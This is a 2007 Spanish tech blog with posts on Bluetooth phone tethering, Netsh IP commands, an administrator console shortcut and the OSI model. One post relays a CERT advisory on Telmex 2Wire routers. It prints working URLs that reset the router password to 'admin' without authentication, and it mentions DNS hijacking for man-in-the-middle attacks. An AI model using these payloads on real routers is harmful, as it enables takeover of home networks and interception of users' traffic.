miércoles, 26 de diciembre de 2007

Aislado de la civilizacion...



Me la he pasado todo el dia 24 de diciembre en el intento de conectarme a internet...

Claro, si hablaramos de que tengo problemas con mi dsl modem o con mi linea telefonica pss todo seria facil de solucionar...
Pero nooooo, estoy en medio de la nada... en el rancho de mis abuelos, aproximadamente a 35 kilometros de la ciudad mas cercana y mas o menos a 22 kilometros del camino asfaltado (digase carretera) mas cercano... conclusion, estoy verdaderamente en medio de la nada...

Sobrevivo con mi lap top cargandola al tomacorriente de mi camioneta asi como cargando mi celular de movistar a la misma gracias a un inversor de corriente que conecto cuando mi camioneta esta encendida... en efecto, no hay corriente electrica de CFE por los alrededores, practicamente la señal de celular es nula con movistar asomando apenas 1 linea de señal y a veces muy a veces 2 lineas de esta (telcel tiene mejor señal aqui con 3 lineas y aveces hasta las 4 completas pero puff esta carisimo para hacer lo que a continuacion describire)... totalmente desesperado pero armado de todos mis gadgets que traigo siempre en la maleta magica, conecto mi dongle bluetooth a la computadora y trato por horas de buscar la mejor posicion para mi celular movistar de forma tal que ande rondando las 2 lineas de señal... despues de cerca de 6 horas con sus descansos derivados de la desesperacion, logro posicionar mi celular sobre un tronco elevado y recuerdo mi curso de inalambricas llevado con el benemerito maestro benito juarez en la maestria la cual dicho sea de paso me quebro la cabeza con calculos de ondas de progragacion y todo para terminar poniendole un pinche plato metalico desechable a la parte posterior de celular mas o menos a 5 centimetros de separacion para generar refraccion de señal, con esto, al fin pude realizar un marcado mediante el bluetooth de la PC puenteado al bluetooth de mi telefono celular usando este ultimo como modem... que a donde marco? bueno, dado que infinitum tiene la misma contraseña y usario para conexion telefonica, use esos mismos datos de mi conexion dsl (alla donde si paso dios repartiendo internet de banda ancha) pero ahora marcando por el modem generado con el celular al servidor prodigy de mi ciudad de origen (de todas formas en movistar es roaming nacional), el cobro??? pss son 5 pesos por 20 minutos de "preciosa" conexion... Preciosa? pero si conecta a 56kbps!! dios santo, pedro pica piedra se estaria burlando de mi con su piedromodem dsl, pero bueno, 56kbps a 15 pesos por una hora de enlace a internet en medio de la nada creo que es mejor que estar buscandole forma a las pinches nubes!!! (eso estaba haciendo cuando se me ocurrio lo del puente bluetooth)...

Gracias a esa conexion hoy les escribo para desearles feliz navidad y crudelia de 25, asi mismo les deseo un feliz año nuevo esperando que todo lo que quieran se cumpla, asi mismo les recuerdo que si desean realmente lograr algo busquenlo, persiganlo, aferrense a el y no hagan caso de lo que otros les digan como por ejemplo: terco(a), necio(a), loco(a) o en su defecto para algunos que conozco ÑOÑOS (AS), siempre piensen que ustedes son lo que son por que asi les gusta ser (lo ñoño(a) no se quita y se nota a leguas jajajaja), no importa lo que los demas les digan, sigan adelante y lleguen donde a los demas no tienen la intencion de llegar, ya que no estos ultimos no lleguen por weba o simplemente por que no les interesa llegar, a fin de cuentas lo que es importante para unos para otros no los sera, de igual forma una cosa es que otros logren algo y otra es que a nosotros nos identifique lo que esos otros lograron o lo que persiguen, cada quien busca lo que quiere, asi pues simplemente demosle por su lado a quien dice lograr algo "importante" aunque no nos parezca algo muy significativo lo que esa persona haya logrado, al menos asi todos se quedan con la satisfaccion de lograr lo que perseguian aunque para nadie mas sea importante, jajajaja que pendejo consuelo verdad, pero que le vamos a hacer, asi es la vida, a veces estamos peor ya que lejos de que otros nos echen la mano apoyandonos aunque no se interesen realmente, optan por intentar destruirnos con criticas, y peor aun hacemos caso a esas criticas, en fin, ya llevo como 5 pesos de conexion jajajaja, asi que reciban un cordial abrazo desde un lugar en medio de la nada... saludos y pasenla super con sus familiares y amigos!!!

miércoles, 19 de diciembre de 2007

Terrible vulnerabilidad en 2Wire

Rayos!!!

Existe una vulnerabilidad impresionante en los dsl modems / routers que da telmex...

Hoy usmeando por la red encontre un articulo de la unam donde el cert encontro una vulnerabilidad terrible que permite cambiar la contraseña del router 2wire y no solo eso, si no modificar los dns para realizar un ataque man in the middle :S chetos!!!!
el ataque se realiza sobre las siguientes direcciones:

http://home/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38&PASSWORD=admin&PASSWORD_CONF=admin&HINT=

http://gateway.2wire.net/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38&PASSWORD=admin&PASSWORD_CONF=admin&HINT=

http://192.168.1.254/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38&PASSWORD=admin&PASSWORD_CONF=admin&HINT=

http://192.168.0.1/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38&PASSWORD=admin&PASSWORD_CONF=admin&HINT=

http://172.16.0.1/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38&PASSWORD=admin&PASSWORD_CONF=admin&HINT=


Aquí se pueden identificar los diversos intentos de llegar al ruteador para reestablecer la contraseña a “admin”. En el caso de nuestro equipo la URL que tuvo éxito fue la correspondiente a la IP 192.168.1.254.
Cabe señalar que el router contaba con una contraseña del sistema, establecida previamente, después de esta etapa del ataque la contraseña fue sobrescrita.

La página desde donde se sobrescribe la contraseña corresponde al wizard de configuración, por lo que al parecer el sistema no pide autenticación si se pasa como parámetro la nueva contraseña.

una vez dentro, modifica los parametros de dns y ejecuta una sustitucion de las paginas que desea redireccionar...

Fuente (con caché de google para que no haya errores por que quiten la pagina):
http://209.85.173.104/search?q=cache:BAaiyILcmygJ:www.seguridad.unam.mx/doc/%3Fap%3Darticulo%26id%3D196+xploit+gusanito+download&hl=es&ct=clnk&cd=17&gl=mx

lunes, 17 de diciembre de 2007

Drivers de VAIO

esta es una pagina para descargar software y drivers oficiales de sony vaio
http://esupport.sony.com/LA/perl/model-home.pl?mdl=VGNFS815F&LOC=3

NETSH

NETSH
Netsh, también llamado NetShell o Network Shell, es una herramienta basada en línea de comando que configura el servicio DHCP, el servicio RAS y servicios de red de enrutamiento. Un contexto de Netsh es un estado en el cual Netsh acepta los comandos relacionados con un sistema específico de funciones. Cada contexto de Netsh contiene las características para manejar un sistema relacionado específico de funciones del establecimiento de una red. Usted puede cambiar a otros contextos escribiendo el nombre de un contexto. También se utiliza para agregar una dirección del Internet Protocol (IP), o para configurar el WINS y el Domain Name System (DNS) en la interfaz.(Traducción hecha por Google)
Como quien dice. Con el NETSH puedes :
Cambiar una dirección IP y Gateway.
Si tu dirección IP es 192.168.0.10, Netmask 255.255.255.0 y Gateway 192.168.0.1 y la quieres cambiar a IP: 192.168.0.69 NM: 255.255.254.0 GW: 192.168.0.2, primero escribe Netsh, luego interface y ahora ip, escribe set address “adaptador” static 192.168.0.69 255.255.254.0 192.168.0.2 1 el último 1 es la interfaz métrica, si no lo escribes, no va a funcionar
Ahora, aspi es como lo verías en tu pantalla. Para conocer tu dirección IP desde línea de comandos escribe IPCONFIG
C:\>ipconfig
Configuración IP de Windows 2000
Ethernet adaptador Ethernet00:
Sufijo DNS específico de la conexión. :Dirección IP. . . . . . . . . . . . . : 192.168.0.10Máscara de subred . . . . . . . . . . : 255.255.255.0Puerta de enlace predeterminada . . . : 192.168.0.1
C:\>netshnetsh>interfaceinterface>ipinterface ip>set address "ethernet00" static 192.168.0.69 255.255.254.0 192.168.0.2 1
Al presionar “Enter” te va a salir un mensaje que dice “Command Succesfully” o “Aceptar”, y si quieres ver que se han realizado los cambios, escribe “quit” para que te regrese a C:\ y una vez ahí escribe de nuevo IPCONFIG para ver los resultados,
C:\>netshnetsh>interfaceinterface>ipinterface ip>set address "ethernet00" static 192.168.0.69 255.255.254.0 192.168.0.2 1Aceptarinterface ip>quitC:\>ipconfigConfiguración IP de Windows 2000
Ethernet adaptador Ethernet00:
Sufijo DNS específico de la conexión. :Dirección IP. . . . . . . . . . . . . : 192.168.0.69Máscara de subred . . . . . . . . . . : 255.255.254.0Puerta de enlace predeterminada . . . : 192.168.0.2
Como puedes ver, hemos cambiado una dirección IP desde línea de comando.
Agregar una dirección IP
IP 192.168.0.10 NM 255.255.255.0 GW 192.168.0.1, y quieres agregar la dirección 192.168.10.10 NM 255.255.0.0 Add address “adaptador” 192.168.10.10 255.255.0.0
C:\>netshnetsh>interfaceinterface>ipinterface ip>Add address "ethernet00" 192.168.10.10 255.255.0.0Aceptar
interface ip>quitC:\>ipconfigConfiguración IP de Windows 2000
Ethernet adaptador Ethernet00:
Sufijo DNS específico de la conexión. :Dirección IP. . . . . . . . . . . . . : 192.168.10.10Máscara de subred . . . . . . . . . . : 255.255.0.0Dirección IP. . . . . . . . . . . . . : 192.168.0.69Máscara de subred . . . . . . . . . . : 255.255.254.0Puerta de enlace predeterminada . . . : 192.168.0.2
Si quieres agregar la misma dirección pero además quieres agregar otro gateway, digamos 192.168.10.1 Add address “adaptador” 192.168.10.10 255.255.0.0 192.168.10.1 1
C:\>netshnetsh>interface ipinterface ip>Add address "ethernet00" 192.168.10.10 255.255.0.0 192.168.10.1 1Aceptarinterface ip>quitC:\>ipconfigConfiguración IP de Windows 2000
Ethernet adaptador Ethernet00:
Sufijo DNS específico de la conexión. :Dirección IP. . . . . . . . . . . . . : 192.168.10.10Máscara de subred . . . . . . . . . . : 255.255.0.0Dirección IP. . . . . . . . . . . . . : 192.168.0.69Máscara de subred . . . . . . . . . . : 255.255.254.0Puerta de enlace predeterminada . . . : 192.168.0.2
Borrar una dirección IP
Si nomás quieres borrar la dirección escribe: delete address “adaptador” 192.168.10.10
C:\>netshnetsh>interface ipinterface ip>delete address "ethernet00" 192.168.10.10Aceptarinterface ip>quitC:\>ipconfigConfiguración IP de Windows 2000
Ethernet adaptador Ethernet00:
Sufijo DNS específico de la conexión. :Dirección IP. . . . . . . . . . . . . : 192.168.0.69Máscara de subred . . . . . . . . . . : 255.255.254.0Puerta de enlace predeterminada . . . : 192.168.0.2
Si quieres borrar la dirección junto con el gateway, escribe: delete address “adaptador” 192.168.10.10 192.168.0.2
C:\>netshnetsh>interface ipinterface ip>delete address "ethernet00" 192.168.10.10 192.168.0.2Aceptarinterface ip>quitC:\>ipconfigConfiguración IP de Windows 2000
Ethernet adaptador Ethernet00:
Sufijo DNS específico de la conexión. :Dirección IP. . . . . . . . . . . . . : 192.168.0.69Máscara de subred . . . . . . . . . . : 255.255.254.0Puerta de enlace predeterminada . . . : 192.168.0.1
Como ya habíamos agregado otro gateway, y borramos el predeterminado, ahora vemos el que habíamos agregado.


fuente: http://raza-mexicana.org/textos/revista/html/15/ezine15-06.htm+netsh+interface+gateway&hl=es&ct=clnk&cd=2&gl=mx

Consola en modo administrador

encontre por ahi un articulo de una pagina que traia estas lineas de comando muy buenas que pueden servirle a cualquiera en un momento dado:

Por seguridad es conveniente trabajar en una cuenta de usuario y no en la de administrador, sin embargo, si en un momento dado necesitamos cambiar permisos, instalar alguna utilidad o cambiar alguna configuración, tendríamos que cerrar todos los programas, cerrar la sesión, entrar como administrador y efectuar los cambios necesarios para luego volver a nuestra sesión de usuario. Windows XP aporta la novedad del cambio rápido de usuario, que permite iniciar otra sesión sin cerrar los programas de la que está activa, pero incluso esto puede ser muy engorroso si lo único que se se quiere es cambiar los permisos de un fichero.
Por ello, una solución, muy al estilo UNIX, es tener un acceso directo a una consola que se ejecute con permisos de administrador. Cualquier programa que se ejecute desde esa consola estará bajo su contexto de seguridad, así que podemos hacer cosas que no se pueden desde la cuenta de usuario. El comando a poner en el acceso directo sería:

%SystemRoot%\System32\runas.exe /noprofile /user:Administrador %SystemRoot%\system32\cmd.exe

Cuando lo ejecutemos nos pedirá la clave de Administrador y en la ventana de comandos que abre podremos ejecutar cualquier aplicación. El uso más común es hacer algún cambio en la configuración, así que los comandos más usados son:


lusrmgr.msc Administración de usuarios y grupos
ervices.msc Lista de servicios
evmgmt.msc Administrador de dispositivos
diskmgmt.msc Administrador de discos
eventvwr.msc Visor de sucesos
perfmon.msc Monitor del sistema
appwiz.cpl Agregar y quitar programas
hdwwiz.cpl Administrador de dispositivos
timedate.cpl Fecha y hora
powercfg.cpl Opciones de energía
sysdm.cpl Sistema (Mi PC → Propiedades)
cacls Cambiar permisos en archivos y carpetas

fuente: http://www.ayudawindows.com/2000/ConsolaAdmin.htm

lunes, 3 de diciembre de 2007

Modelo OSI en resumen practico

El modelo osi fue creado por la organizacion internacional de estadarizacion (ISO) y esta orientado a conectividad de sistemas abiertos, este es un modelo ampliamente utilizado en protocolos de comunicacion... Hoy me preguntaron como comprender la cantidad de capas en el modelo y el nombre de los encapsulados segun la capa en la que se encuentra... Como solucion para comprenderlo y aprenderselo pueden seguir los siguientes pasos...

1.- Entender y memorizar que el modelo osi tiene 7 [SIETE] capas.
2.-Comprender que el modelo se ve desde dos puntos de vista, el EMISOR y el RECEPTOR.
NOTA.- EMISOR es quien Transmite informacion. RECEPTOR es quien recibe la informacion.
3.- Entendidos los puntos de vista, el modelo osi visto desde el punto de vista del emisor, se tiene:

A
P
S
T
R
E
F

Es decir, siete iniciales bastante entendibles... La pregunta obligada,  a que se refiere cada inicial?

Aplicacion
Presentacion
Sesion
Transporte
Red
Enlace de Datos
Fisica

Estas capas tienen una labor, eso lo detallare mas adelante, ahora bien, dentro de las capas los datos van cambiando a traves del tiempo, estos datos se encapsulan, lo importante es saber como se le llaman a los datos encapsulados...

A
P
S
T - S
R - P
E - T
F - B

Que rayos es esto?
En la capa de transporte se le llama SEGMENTO.
En la capa de Red se le llama PAQUETE.
En la capa de Enlace de Datos se le llama Trama.
En la capa Fisica se le llama BIT.

Para no confundirlos mas pues si lo vemos desde el punto de vista que en el abecedario antes de la T va la S, en la capa de Transporte se llama Segmento y de ahi sigue Paquete, Trama y Bit en las capas subsecuentes.